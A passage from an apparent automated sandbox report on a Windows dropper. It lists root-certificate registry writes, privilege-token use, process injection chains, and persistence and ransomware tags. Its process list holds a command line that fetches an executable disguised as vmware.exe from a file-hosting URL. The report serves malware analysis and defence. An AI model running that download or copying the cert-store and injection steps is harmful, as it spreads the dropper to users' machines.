ec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2588 wrote to memory of 116 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2588 wrote to memory of 116 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2588 wrote to memory of 116 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2588 wrote to memory of 3864 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe
PID 2588 wrote to memory of 3864 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe
PID 3864 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe
PID 3864 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe
PID 3864 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe
PID 3864 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 3864 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 3864 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 4116 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 4116 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 4116 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 1284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1284 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 540 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 540 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 540 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 540 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 540 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 540 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2588 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

